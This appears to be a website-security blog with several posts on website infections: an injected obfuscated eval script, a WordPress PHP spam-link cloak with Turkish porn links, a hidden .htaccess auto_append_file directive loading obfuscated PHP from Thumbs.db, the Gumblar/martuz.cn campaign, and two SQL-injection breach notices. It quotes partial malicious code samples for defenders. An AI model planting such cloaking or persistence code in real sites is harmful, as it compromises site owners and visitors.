WeWatchYourWebsite

"so you don't have to!"

By

gogele analytics infection

We’re seeing some websites infected with code that starts with:

gogele analytics start

It then continues with:

(opening script tag)try{document.asd.removeChild({})}catch(q){ss=””;s=String;}ddd=new Date();…eval(ss);(closing script tag)

and ends with:

gogele analytics end

We’ve been seeing this in index.html files usually immediately following the opening body tag ().

So far, no other common factors in the sites we’ve cleaned this from.

If you have any further information you’d like to share, please post a comment. If we find more information we’ll be sharing it here.

If you know of someone who could benefit from this information, please share it, Tweet it, post it on your Facebook or LinkedIn pages.

If you need help cleaning this, you can call us at (847)728-0214 or email directly at: traef@wewatchyourwebsite.com

Thank you.

By

Spam links in WordPress infected websites

We’ve been seeing a lot of spam links in WordPress index.php files. Even the “silence is golden” 30 byte index.php files sprinkled throughout a WordPress installation have been infected.

These infected websites had other malicious code as well, but the index.php files had variations of the following code:

<!– /harew–>

<?

$agent = $_SERVER[‘HTTP_USER_AGENT’];

if(!eregi(“google”,$agent))

{

?>

<div style=”position:absolute; top:-99999px;”>

<?

}

?>

bedava <a href=”http://sikisizleriz.blogspot.com/”>sikis</a> videolarinin bulabileceginiz adrestir tikla sonra git diger sitede sinirsiz video izle

bedava <a href=”http://bedavapornocu.blogspot.com/”>porno</a> videolarinin bulabileceginiz adrestir tikla sonra git diger sitede sinirsiz video izle

bedava <a href=”http://http://grupsikisizle.blogspot.com/”>sex</a> videolarinin bulabileceginiz adrestir tikla sonra git diger sitede sinirsiz video izle

bedava <a href=”http://fulllezizle.blogspot.com/”>lezbiyen</a> videolarinin bulabileceginiz adrestir tikla sonra git diger sitede sinirsiz video izle

bedava <a href=”http://sikisizlex.blogspot.com/”>sikis</a> videolarinin bulabileceginiz adrestir tikla sonra git diger sitede sinirsiz video izle

free <a href=”http://freefullsex.blogspot.com/”>sex</a> videos

free <a href=”http://freesexfull.tumblr.com/”>sex</a> videos

</div>

Currently we see about 12,000+ websites infected with this code. These sites are usually infected with a variety of .htaccess file infections as well, so just removing this code will not clean your website.

For instance, many of them have this in their .htaccess files:

php_value auto_append_file /home/path_to_/public_html/websitename/Thumbs.db

This will add (append) whatever is in the Thumbs.db file to files when the page is rendered. This will show the infectious code in Thumbs.db after running the PHP code in Thumbs.db, when you view source on an infected web page, but when you look in the raw code of the index file, the code won’t be there.

This line is usually preceeded by many, many blank lines in an attempt to hide it. Inside the Thumbs.db file is code like:

<?php
@error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = “7kyJ7kSK…;$eva1tYlbakBcVSir = “\x67\141\x6f\133\x70\170\x65″;$eva1tYldakBoVS1r = “\x65\143\x72\160″;$eva1tYldakBcVSir = “”;$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} ?>

Which is the infectious code delivered to any web page rendered from the folder with the above .htaccess file.

There doesn’t appear to be any common characteristic of the websites infected with this, other than the infected websites we’ve cleaned have all been WordPress. They were already at the current version, some have the vulnerable timthumb.php files, some don’t. Some are using FCKeditor in one way or another and we have seen this as a successful attack vector for quite awhile.

If you have this type of infection, please post a comment with any other information you may have regarding this. Mostly, what plugins you have on your site. Maybe then as a community we can zero in on the root cause.

If you found this post useful or informative, please Tweet about us, like us on Facebook, or just post a comment.

As always, if you need help cleaning this from your website, please send me an email: traef@wewatchyourwebsite.com.

Thank you.

By

New Domain – Same Damage

If you have a website, you may have had your website attacked by cybercriminals using the Gumblar.cn hack.

This hack was responsible for thousands of websites serving infectious code to their visitors.

However, the domain that was hosting further links to malicious downloads was gumblar.cn however, that domain has been shutdown and now many of the newer infections are using martuz.cn as their primary malicious download domain.

What the new code does is check to see if you are visiting using the Google Chrome browser on Windows XP and your browser is set to allow cookies.

I think, the reason behind this is to prevent the automated scanners from finding their infectious code. Many scanners don’t try different user agents, referers or allow cookies. This prevents them from finding these new malscripts.

We’ve even seen where sites had their robots.txt file modified and only the webpages that were serving up malscripts were inserted into the robots.txt so Google wouldn’t index them.

This all points to the fact that many people rely on Google to check their site for malscripts. Google will of course post their moniker “This site may harm your computer” on all of the Search Engine Result Pages (SERPs) and browsers like Google Chrome and Firefox will alert all visitors to the infectious website of it’s malware intentions. This typically will create a desire in some to notify the site owner who then goes into recovery mode to clean their site.

You can’t just scan your sites for any line that contains martuz.cn as the script files being inserted have obfuscated the domain name so it must be concatenated in order to see it. The malscripts are inserted into .htm, .html, .asp, .aspx, .js and .php files.

The cybercriminals have been very clever at disguising their malscripts.

It still appears that the way the cybercriminals gain access to websites is through a virus on the system that uploads to the website. This virus doesn’t seem to be detectable by many of the more popular anti-virus programs. We’ve worked with thousands of site owners, many of them had Norton or McAfee and they weren’t able to detect the virus.

We’ve been recommending AVG or Avast or Malwarebytes. These seem to find the virus after many scans with other anti-virus programs failed.

We also recommend getting away from FTP. We’re putting together some video instructions on the why’s and how’s of moving away from FTP. We’ll post here when we have them ready. It should be later this week.

Until then, watch your websites for any changes. It’s the only way.

By

www.tiscali.co.uk was hacked

According to information freely available, the website www.tiscali.co.uk has been hacked.

Primary Method: SQL Injection

Hazard to Humanity: Low

Date: March 15, 2009

Although hundreds of thousands of people login to this website, unless they’re using the same username and password for this site that they do for all their online activity; banking, bill paying, ebay, etc., then the actual risk is low. We gave this one a Low rating because it isn’t a site with financial information, but it is a very popular website.

Remediation and Preventative Measures: Properly sanitizing all data prior to inserting into database

By

www.telegraph.co.uk hacked

According to reports, the website for The Telegraph was hacked.

Primary Method: SQL Injection

Hazard to Humanity: Very Low

Date: March 6, 2009

Actually the site was: search.property.telegraph.co.uk and only the usernames and passwords of people who login to the site were exposed. As always, often times people use the same username and password for a variety of logins so an incident like this could grow bigger than just having someone post comments using a “hacked” username and password.

Remediation and Preventative Measures: Same as for all SQLi attacks – properly sanitizing all data submitted to a SQL database.